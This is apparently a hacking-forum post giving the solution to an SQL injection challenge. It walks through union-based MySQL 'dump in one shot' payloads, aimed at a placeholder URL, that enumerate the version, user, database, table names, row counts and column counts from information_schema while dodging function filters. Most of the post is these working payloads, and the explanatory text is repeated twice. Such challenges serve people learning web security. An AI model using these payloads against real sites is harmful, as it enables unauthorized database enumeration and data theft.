Kashmiri_Wolf]Sqli Challenge 12[Solution]
Kashmiri_Wolf]Sqli Challenge 12[Solution]
Ok I Guess This Is The Moment Most OF You Guys Were Waiting For ! Here Is Solution Of My 12th Challenge !
Here Is Link
Challenge No 12
Lets Have A Look At Tasks Vs Rules
Tasks :
1.Print Your Name with Version
2.Print User And DB
3.Print Tables Starting With 'a' With Their Records
4.Print Other Tables
5.Non Of Your Table Should Repeat
6.Get Table Records And No Of Columns For Other Tables which are not starting with 'a'
7.Skip The Table Where Records are zero(Not Starting With A) and Show That Table Which Is Skipped And Show That In Preformatted Text (Check PoC)
Rules :
Use Dios
You May Not Use Replace,Insert,concat_ws,group_concat,make_set,export_set
You May Use concat(Once For Dios Only)
You May Not Try To Manipulate Data To get Tasks 3 and 4 By using some limiting functions
You Query May Not Contain More Than 4 Selects (+1 For UniON SelEct)
You May Not Declare More Than One Variable(Only For Dios)
You May Not Use count() more than once
Dont Use any Function Before Dios's concat
Dont Use Like/Regexp/find_in_set/position/locate function For Task 3
Dont Use group by/order by
PS:
Nested Function Is allowed But For Dios Use Only Concat
I Will Just Explain Task 3,4,7
Lets Start :
We Will Use Mostly If Function Here
if(condition,if_true,if_false)
Lets Dios First
ok its working
Lets Print Those Tables Which Are Starting With A
For That We Will Use Left()
Fucntion
Left(str,length)
Now Lets Print Table Records With Tables Starting with 'A'
Now Lets Complete The Tasks "if table_rows = 0 skip them and print them in preformated Text"
For This We Will Use if(table_rows=0,concat('<pre>Table ',table_name,' Skipped</pre>'),0x00)
But We Cant Use Concat here because its blocked in rules so lets use "updatexml()"
And Here's The Final Query
Sorry For Not Explaining It Much ******. A Lil Time ******. So Hope You Guys Can Understand
Greetz To r0ot h3x49,makman,benzi,rummy,ajkaro,cybrhckr,master Sniper,Cheetah
Regards
Kashmiri_Wolf
Allah Hafiz !
Here Is Link
Challenge No 12
Lets Have A Look At Tasks Vs Rules
Tasks :
1.Print Your Name with Version
2.Print User And DB
3.Print Tables Starting With 'a' With Their Records
4.Print Other Tables
5.Non Of Your Table Should Repeat
6.Get Table Records And No Of Columns For Other Tables which are not starting with 'a'
7.Skip The Table Where Records are zero(Not Starting With A) and Show That Table Which Is Skipped And Show That In Preformatted Text (Check PoC)
Rules :
Use Dios
You May Not Use Replace,Insert,concat_ws,group_concat,make_set,export_set
You May Use concat(Once For Dios Only)
You May Not Try To Manipulate Data To get Tasks 3 and 4 By using some limiting functions
You Query May Not Contain More Than 4 Selects (+1 For UniON SelEct)
You May Not Declare More Than One Variable(Only For Dios)
You May Not Use count() more than once
Dont Use any Function Before Dios's concat
Dont Use Like/Regexp/find_in_set/position/locate function For Task 3
Dont Use group by/order by
PS:
Nested Function Is allowed But For Dios Use Only Concat
I Will Just Explain Task 3,4,7
Lets Start :
We Will Use Mostly If Function Here
if(condition,if_true,if_false)
Lets Dios First
PHP Code:
site.com/some.php?some=5 union select 1,2,3(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())and(@a)in(@a:=concat(@a,table_name,'<br>'))))a),5,6-- - ok its working
Lets Print Those Tables Which Are Starting With A
For That We Will Use Left()
Fucntion
Left(str,length)
PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@a)in(@a:=concat(@a,if(left(table_name,1)='c',table_name,0x00)))))a) Now Lets Print Table Records With Tables Starting with 'A'
PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@a)in(@a:=concat(@a,if(left(table_name,1)='a',updatexml(updatexml('<br/><b></b> :: Table Records ~~>
<c></c>','/b',table_name),'/c',table_rows),0x00)))))a) Now Lets Complete The Tasks "if table_rows = 0 skip them and print them in preformated Text"
For This We Will Use if(table_rows=0,concat('<pre>Table ',table_name,' Skipped</pre>'),0x00)
But We Cant Use Concat here because its blocked in rules so lets use "updatexml()"
And Here's The Final Query
PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@a)in(@a:=concat(if(@a=0x00,'Kashmiri_Wolf ::',0x00),if(@a=0x00,version(),0x00),if(@a=0x00,'<br>',0x00),
if(@a=0x00,user(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,database(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'Tables Starting With A <br> ',0x00),@a,if(left(table_name,1)='c',updatexml(updatexml('<b></b>
:: Table Records ~~> <c></c>','/b',table_name),'/c',table_rows),if(table_rows=0,updatexml(updatexml('<br /><pre />Table
:: "<a></a><b></b>',+'/a',table_name),'/b','" Skipped</pre>'),updatexml(updatexml(updatexml('<font color=red>Other Tables
~~> </font><a></a><font color=red > :: Table Records ~~> </font><b></b><font color=red > No Of Columns ~~> </font><c></c>','/a',@Col:=table_name),'/b',table_rows),'/c',(select count(*) from information_schema.columns where table_name=@Col)))),0x3c62723e))))a) Sorry For Not Explaining It Much ******. A Lil Time ******. So Hope You Guys Can Understand
Greetz To r0ot h3x49,makman,benzi,rummy,ajkaro,cybrhckr,master Sniper,Cheetah
Regards
Kashmiri_Wolf
Allah Hafiz !
No comments